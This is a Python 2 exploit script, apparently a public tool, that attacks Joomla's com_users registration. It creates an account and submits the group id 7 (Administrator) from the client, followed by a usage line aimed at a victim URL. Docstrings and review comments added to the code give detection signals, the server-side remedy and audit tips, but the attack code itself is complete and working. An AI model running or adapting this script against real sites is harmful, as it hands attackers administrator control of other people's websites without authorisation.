1 | Video http://www.youtube.com/watch?v=jg6_MN1wQxI&feature=youtu.be | |
2 | ||
3 | #!/usr/bin/python | |
4 | # Joomla Com_User Auto Exploit =D | |
5 | # By Xtroj-EnTn | |
6 | ||
7 | import requests as sec4ever, re, urllib, sys, os | |
8 | from threading import Thread | |
9 | from time import sleep | |
def cls():
    """Clear the terminal with the platform's native command."""
    # os.name is 'nt' on Windows, where the command is `cls`; elsewhere `clear`.
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
12 | ||
cls()
# Banner printed on every run (Python 2 print statement).
print '''

Joomla Com_User Auto Exploiter
#Contact Me: Virus-Tn@hotmail.com
#Greets: Zisahn Rider - Hatem Dridi
Facebook : https://www.facebook.com/profile.php?id=100007271865841
#Coded By: Xtroj-EnTn'''

# Fixed value that one() sends as jform[password2]; it is not the
# user-supplied pwd1, so the two password fields of that request do not match.
pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
def one(target,pwd1,pwd2,email):
    """Submit the com_users registration form once with mismatched passwords.

    Loads the registration page through the shared ``xsec`` session, reads the
    name of a hidden form field from it, and POSTs a registration whose
    jform[password1] and jform[password2] differ and which carries a
    client-supplied jform[groups][] value. The username is taken from the
    module-level ``user`` global, not from a parameter.

    Returns nothing; the responses (``p1``, ``x2``) are stored but never
    inspected. ``token[0]`` raises IndexError when the page has no matching
    hidden field.

    Defender notes:
      * NOTE(review): a stock registration form is not expected to send
        jform[groups][]; a POST to option=com_users with that field is a
        candidate log/WAF detection signal - confirm against the deployed
        Joomla version's form.
      * The display name is hard-coded to 'Xtroj', which can be searched for
        in the user table when triaging a site.
    """
    # Password fields differ on purpose in this request (pwd1 vs. pwd2).
    x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
    # Presumably Joomla's per-session form token: a hidden input whose name is
    # the token and whose value is "1" - confirm.
    token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
    post = {}
    post["jform[name]"] = 'Xtroj'
    post["jform[username]"] = user
    post["jform[password1]"] = pwd1
    post["jform[password2]"] = pwd2
    post["jform[email1]"] = email
    post["jform[email2]"] = email
    # Group membership supplied by the registering client.
    # NOTE(review): 7 is the Administrator group id in a default Joomla
    # install - confirm. Self-registration input should never be allowed to
    # set group membership server-side.
    post["jform[groups][]"] = "7"
    post["option"] = "com_users"
    post["task"] = "registration.register"
    post[token[0]] = "1"
    p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
    x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
40 | ||
def exploit(target,pwd1,pwd2,email):
    """Resubmit the com_users registration form with matching passwords.

    Same request sequence as one(), sent over the same ``xsec`` session, except
    that both password fields are set to ``pwd1``; the ``pwd2`` parameter is
    accepted but unused here. The username again comes from the module-level
    ``user`` global, and the client-supplied jform[groups][] value is sent a
    second time.

    Returns nothing (no return statement); the responses (``p2``, ``x4``) are
    never checked. ``token[0]`` raises IndexError when the page has no
    matching hidden field.

    Defender notes:
      * NOTE(review): the server-side remedy is for registration handling to
        discard group membership supplied by the client; run a patched Joomla
        release and disable front-end registration where it is not needed.
      * When auditing, review front-end-registered accounts that hold
        privileged group membership, including any with display name 'Xtroj'.
    """
    # The original comment here read "Wrong Password", but in this request
    # password1 and password2 are both pwd1, i.e. they match.
    x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
    # Presumably Joomla's per-session form token (hidden input, value "1") -
    # confirm.
    token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
    post = {}
    post["jform[name]"] = 'Xtroj'
    post["jform[username]"] = user
    post["jform[password1]"] = pwd1
    post["jform[password2]"] = pwd1
    post["jform[email1]"] = email
    post["jform[email2]"] = email
    # Client-supplied group id. NOTE(review): 7 is the Administrator group in
    # a default Joomla install - confirm.
    post["jform[groups][]"] = "7"
    post["option"] = "com_users"
    post["task"] = "registration.register"
    post[token[0]] = "1"
    p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
    x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
58 | ||
# One requests session (imported as ``sec4ever``) shared by one() and
# exploit(), so cookies set by the site persist across both registration
# attempts.
xsec = sec4ever.session()
if len(sys.argv) == 5:
    # argv: base URL, username, password, e-mail. These are module globals;
    # one() and exploit() read ``user`` from here rather than as a parameter.
    target = sys.argv[1]
    user = sys.argv[2]
    pwd1 = sys.argv[3]
    email = sys.argv[4]
    # First request: mismatched passwords (pwd1 vs. the fixed pwd2).
    one(target,pwd1,pwd2,email)
    # Second request: matching passwords. exploit() has no return statement,
    # so ``ex`` is always None and is never read.
    ex = exploit(target,pwd1,pwd2,email)
    # Printed unconditionally - no HTTP response is checked, so this message
    # does not indicate that an account was created. It also echoes the chosen
    # password to stdout. The account still needs e-mail activation per this
    # message, so activation mails to unknown addresses are a further audit
    # trail on the site side.
    print '[*] Go To Your Email & Active Then Login :D\nUsername: '+user+' & Password: '+pwd1
else:
    print "Usage: python tool.py http://www.victime.com/ youruser yourpass yourmail"